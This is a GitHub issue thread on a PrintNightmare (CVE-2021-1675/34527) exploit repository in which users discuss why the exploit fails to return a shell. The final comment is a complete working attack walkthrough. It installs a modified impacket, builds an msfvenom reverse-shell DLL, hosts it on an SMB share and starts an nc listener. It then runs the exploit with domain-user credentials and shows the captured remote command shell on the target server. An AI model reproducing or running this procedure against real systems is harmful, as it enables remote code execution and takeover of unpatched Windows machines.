cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

not returning shell #68

Open cybertuxh4xor opened 2 years ago

cybertuxh4xor commented 2 years ago

(image attachment)

CustosClarus commented 11 months ago

It will solve it for you if you use the domain user account, not the admin.

sasdallas commented 6 months ago

@CustosClarus what exactly do you mean by this?

cybertuxh4xor commented 6 months ago

It has been so many months ago, I don't remember anymore. All I know is that the tool showed as complete with no errors and did not return a reverse shell.


MiMaz7707 commented 2 months ago

I'm facing the same problem.

MiMaz7707 commented 2 months ago

Hello,

Finally I managed to get the shell :D. The exploit will not work if you use a privileged user; the user must be a simple domain user.

Steps:

1- Remove the preinstalled impacket package:

```
# apt remove --purge python3-impacket
```

or

```
# pip3 uninstall impacket
```

2- Install the impacket package from the cube0x0 repo:

```
# git clone https://github.com/cube0x0/impacket
# cd impacket
# python3 ./setup.py install
```

3- Create a DLL payload:

```
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.117.200 LPORT=9090 -f dll -o print64.dll
```

4- Put the payload on a shared folder and run smbserver.py or the smbd service:

```
# cp print64.dll /share/

# smbserver.py share /share -smb2support

/usr/local/bin/smbserver.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'smbserver.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

5- Run nc for listening:

```
# nc -lvp 9090
listening on [any] 9090 ...
```

6- Run the exploit with a simple domain user; it will generate some errors but it will work:

```
# python3 CVE-2021-1675.py mylab.local/user:'user@koko123'@192.168.117.10 '\\192.168.117.200\share\print64.dll'

[*] Connecting to ncacn_np:192.168.117.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3d8f0626c408afea\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.80.41\share\print64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smbconnection.py", line 568, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/smb3.py", line 1650, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
```
7- Here is my shell :D

```
nc -lvp 9090
listening on [any] 9090 ...
connect to [192.168.117.200] from SRV-EX01.mylab.local [192.168.117.10] 52823
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
SRV01

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::4980:feb4:6fae:992d%6
   IPv4 Address. . . . . . . . . . . : 192.168.117.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.117.254

Tunnel adapter isatap.{EC174390-CEE5-4891-85B5-536D188BC65E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>
```